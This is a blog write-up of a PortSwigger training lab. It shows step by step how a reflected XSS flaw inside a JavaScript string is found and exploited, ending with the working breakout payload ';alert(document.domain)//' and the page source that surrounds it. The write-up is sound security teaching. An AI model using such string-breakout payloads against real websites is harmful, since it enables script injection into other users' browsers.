siunam's Website

My personal website

Home Writeups Blog Projects About E-Portfolio

Reflected XSS into a JavaScript string with angle brackets HTML encoded | Dec 29, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: Reflected XSS into a JavaScript string with angle brackets HTML encoded! Without further ado, let’s dive in.

Background

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Exploitation

Home page:

In here, we can there is a search box.

Let’s search something:

As you can see, our input is reflected to the web page.

Let’s try to inject a JavaScript code that calls function alert():

<script>alert(document.domain)</script>

View source page:

<section class=blog-header>
    <h1>0 search results for '&lt;script&gt;alert(document.domain)&lt;/script&gt;'</h1>
    <hr>
</section>
<section class=search>
    <form action=/ method=GET>
        <input type=text placeholder='Search the blog...' name=search>
        <button type=submit class=button>Search</button>
    </form>
</section>
<script>
    var searchTerms = '&lt;script&gt;alert(document.domain)&lt;/script&gt;';
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

In here, we can see that our <> were HTML encoded.

Also, our input is being parsed to the document.write.

Let’s try to break that JavaScript string:

'" onload=alert(document.domain) close="

View source page:

<section class=blog-header>
    <h1>0 search results for '&apos;&quot; onload=alert(document.domain) close=&quot;'</h1>
    <hr>
</section>

Hmm… Looks like we can’t use <>'".

To breaking out of a string literal, we can use:

';alert(document.domain)//

The '; is to end the string and the current JavaScript line, then the // is to commented out the reset of the JavaScript code.

We did it!

What we’ve learned:

  1. Reflected XSS into a JavaScript string with angle brackets HTML encoded